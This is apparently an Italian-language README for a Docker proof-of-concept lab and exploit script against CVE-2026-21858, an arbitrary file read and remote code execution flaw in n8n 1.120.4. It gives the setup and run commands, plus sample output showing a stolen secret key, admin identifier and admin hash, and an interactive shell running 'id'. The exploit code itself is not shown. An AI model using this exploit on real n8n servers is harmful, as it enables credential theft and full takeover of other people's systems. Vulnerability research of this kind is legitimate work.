
Ambiente PoC basato su Docker e script di exploit per CVE-2026-21858, una vulnerabilità di lettura arbitraria di file e RCE in n8n 1.120.4, che fornisce estrazione di segreti e una shell interattiva.
Ambiente PoC per n8n 1.120.4 con un workflow Form Trigger e uno script di exploit.
Dockerfile — build dell'ambiente n8n vulnerabilerun.bat — avvia il container (Windows)workflow.txt — workflow n8n (include Form Trigger)poc.py — script PoCrequirements.txt — dipendenze del PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, identificatori admin) dal target.n8n-shell>).id) restituisce l'output dall'ambiente target (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
Pubblichiamo analisi di CVE e malware una volta al mese. Se sei interessato, segui i link qui sotto per consultare le nostre pubblicazioni.